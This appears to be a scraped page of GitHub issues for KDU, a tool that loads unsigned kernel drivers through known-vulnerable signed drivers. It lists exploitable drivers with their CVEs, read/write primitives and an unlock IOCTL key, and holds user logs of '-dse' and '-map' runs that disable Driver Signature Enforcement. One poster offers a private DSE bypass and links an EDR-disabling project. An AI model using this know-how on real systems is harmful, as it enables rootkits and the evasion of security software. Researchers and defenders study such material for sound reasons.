    Driver locked, unlocking rep for reference https://github.com/hfiref0x/AsIo3Unlock. Disadvantage is requirement to use AsusCertService application as zombie proxy for registering AsIO3 "trusted" application. Besides it is still the same WINIO just WHQL signed in Dec 2020.

  3. ATI atillk64.sys - respective CVE ids: CVE-2019-7246, CVE-2020-12138. Disadvantages are: driver is very old and provides access to physical memory through MmMapIoSpace which limits it use.

  4. DELL PC Doctror pcdsrvc_x64.sys - Driver locked, unlocking requires sending IOCTL with specific value as "key" 0xA1B2C3D4. Disadvantage is MmMapIoSpace.

  5. GPU-Z gpu-z.sys driver - respective CVE id: CVE-2019-7245. Disadvantage is MmMapIoSpace.

  6. miHoYo mhyprot2.sys driver - anti-cheat driver from Chinese game company. Itself a wormhole with functionality to read/write to the virtual memory of arbitrary processes and read arbitrary kernel memory. Driver is locked, unlocking code is available. Disadvantages: does not provide write access to kernel/physical memory, extensive size (>1 Mb).

  7. Razer Synapse rzpnk.sys driver - respective CVE id: CVE-2017-14398. Despite having amazing features on board this driver doesn't allow physical memory access beyond 4Gb as it truncates addresses above. In general it is unusable for main KDU tasks.

  8. Supermicro superbmc.sys driver - based on MAPMEM. Disadvantage: this driver has initialization bug which result in BSOD on it load at certain conditions.

  9. VirtualBox vboxdrv.sys from Chinese APT which is different to original Turla group driver. While they utilize the same unpatched exploit of VBox 1.6-2.x it uses different driver and original exploit code need a little tweak to work with it. Disadvantages: driver is old, since 1.6 experience it is known that vboxdrv is exclusively bugged, implementing this will require a lot of additional code as it need different approach for code execution.

  10. Some AMI BIOS flashing drivers based on WINIO, unfortunately they expect bus address to be 32 bit long.

  11. Lalla NVME Pin driver - device driver from NVMECraft bundle. Contains MmMapIoSpace arbitrary read/write primitive, however due to driver bug it abuse is way too complicated.

  12. Getac gtckmdfbs driver. Contain full set of wormhole features, however memory physical address is limited to ULONG limit.

and dozens I/O drivers based on WINIO and WinRing0 from various HW vendors.

Critical Structure Corruption BSOD

I have some question,

  1. Do I need to run '-dse 0' after using '-dse 6'?
  2. Does CRITICAL_STRUCTURE_CORRUPTION BSOD have todo with KDU?
  3. Do I have to do anything after using KDU, like revert back something?

I dont know how or why my pc just got BSOD sometime even after I restarted my pc, happens after i use '-dse 6' and '-map driver.sys' on kdu.

Could not query DSE state, GetLastError 5

I am using Windows 10 with the latest version 21H1 build 19044.1826
I have tried disabling Secure Boot, disabling Memory Integrity from windows defender, but when i do the command kdu -dse ANYTHING, I get this output:

[#] Kernel Driver Utility v1.2.0 (build 2202) started, (c)2020 - 2022 KDU Project
[#] Build at Thu Feb 17 01:33:48 2022, header checksum 0x4D588
[#] Supported x64 OS : Windows 7 and above
[*] Windows version: 10.0 build 19044
[*] SecureBoot is disabled on this machine
[+] Provider: "CVE-2015-2291", Name "NalDrv"
[+] Drivers database "drv64.dll" loaded at 0x0000019058F80002
[+] Extracting vulnerable driver as "C:\Users\user\Desktop\NalDrv.sys"
[+] Vulnerable driver "NalDrv" loaded
[+] Vulnerable driver "NalDrv" opened
[+] Executing post-open callback for given provider
[+] Driver device security descriptor set successfully
[+] Module "CI.dll" loaded for pattern search
[!] Could not query DSE state, GetLastError 5
[!] Unable to unload vulnerable driver, NTSTATUS (0xC0000010)
[+] Return value: 0. Bye-bye!

a question please

hello friends
and thank you for your hard works

i have a questions please
i compiled a driver using examples from this repo
i want to use ZwProtectVirtualMemory
but as described only ntoskrnl symbols was resolved

so i tried to find its address and direct use it
using MmGetSystemRoutineAddress
but i will get BSOD KMOD_UNHANDLED_ECECPTION
isnt this code should work ? as i only used ntoskrnl symbols to locate function in kernel and use it

and if not
is there any better way to solve ?
i want to change protection of user mod process
and __try __except those are not usefull in maped driver ?

unable to load venerable driver

Unable to load vulnerable driver, NTSTATUS (0xC000009A)
Return value: 0

I get this error when I use "kdu -dse 6"

any way to fix?

Insufficient system resources

Hi! I'm trying to run the utility with .\kdu.exe -map .\mydriver.sys in powershell admin, receive this log:

[#] Kernel Driver Utility v1.3.3 (build 2307) started, (c)2020 - 2023 KDU Project
[#] Built at Fri Sep  1 10:17:29 2023, header checksum 0x55823
[#] Supported x64 OS : Windows 7 and above
[*] CPU vendor string: AuthenticAMD
[*] Windows version: 10.0 build 22621
[*] SecureBoot is enabled on this machine
[*] WHQL enforcement ENABLED
[+] MSFT Driver block list is enabled
[*] Driver mapping using shellcode version: 1
[+] Input driver file ".\mydriver.sys" loaded at 0x00007FF99A420000
[+] MSFT hypervisor present
[+] Drivers database "drv64.dll" loaded at 0x00007FF96C700000
[+] Firmware type (FirmwareTypeUefi)
[+] Provider: "CVE-2015-2291", Name "NalDrv"
[+] Extracting vulnerable driver as "path\NalDrv.sys"
[!] Unable to load vulnerable driver, NTSTATUS (0xC000009A): Insufficient system resources exist to complete the API.
[+] Return value: 0. Bye-bye!

I've noticed other closed issues for the block list and enforcement, but I'm unsure this issue relates to them, since the error is about system resources. I have 16 Gb RAM in total, 8 Gb unused, so I doubt it's RAM. Is there any other troubleshooting I can do?
I tried running the system without driver signature checking using this tutorial using Disable driver signature enforcement but it didn't help.

NalDrv seems to bug out

When trying to leverage KDU's 0 provider (NalDrv) I get the following error:

[#] Kernel Driver Utility v1.1.1 started, (c)2020 - 2021 KDU Project
[#] Build at Fri May 14 22:25:32 2021, header checksum 0x3E810
[#] Supported x64 OS : Windows 7 and above
[*] Windows version: 10.0 build 19043
[*] SecureBoot is disabled on this machine
[+] Selected provider: 0
[*] Driver mapping using shellcode version: 1
[+] Input driver file loaded at 0x00007FF605B60000
[+] Provider: CVE-2015-2291, Name "NalDrv"
[+] Drivers database "drv64.dll" loaded at 0x000001EB374E0002
[!] Vulnerable driver is already loaded
[+] Vulnerable driver opened
[+] Executing post-open callback for given provider
[+] Driver device security descriptor set successfully
[+] Victim driver map attempt 1 of 3
[+] Extracting victim driver "PROCEXP152" as "C:\Users\Jean\AppData\Local\Temp\PROCEXP152.sys"
[+] Victim driver loaded, handle 0x00000000000000EC
[+] Reading FILE_OBJECT at 0xFFFFC30ADBAA7260
[!] Could not read FILE_OBJECT at 0xFFFFC30ADBAA7260
[!] Error preloading victim driver, abort
[+] Victim driver unloaded
[!] Unable to unload vulnerable driver, NTSTATUS (0xC0000034)
[+] Return value: 0. Bye-bye!

When checking sysmon, I do not see any new event ID 6 loads for the NalDrv
I do see a reg entry for NalDrv being created by KDU, but the regentry does not specify a driver location.

naldrvbug

lastely, in the readme.md, provider 0 is labeled as IQVM64, I think this is a mistake?

Thanks

Hi.

Unless you're not already aware of https://github.com/ByteWhite1x1/EDR-bypass-disable-PspNotifyEnableMask

I also have DSE bypass at runtime for Windows 10/11 22H2. If you need. That's my thank you to for the KDU project. It's been really useful with testing.

You just PM me or something if you want a private DSE bypass. As of 09/2023. MS has patched this in the latest Windows 10 Pro 22H2. You need to do the PTE trick to bypass DSE without a BSDO. I don't want to post this information publicly. It's only for those who work hard like you.

Crashes on reading FILE_OBJECT

Hi (me again),

I'm trying to map a driver with the drvmap function. However, my PC blue screens on reading FILE_OBJECT (I assume where it calls ReadKernelVM?). This only happens for one of the drivers I am using, both of them I have compiled and made driverless.
(The other one works perfectly). The driver entry point does not appear to be called before the crash. When I debugged the kernel crash dump in WinDbg with my driver source, it did not reference it in the slightest. Instead it gave the NTSTATUS error "reached breakpoint"?

I read that there is an issue when having vgc installed, so I uninstalled it yet I get the same result.

If you want I can attach a copy of the driver I am trying to map. I have tried providers 1 and 2 and concluded after it crashing on both of them that it was independent of that.

Thanks

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.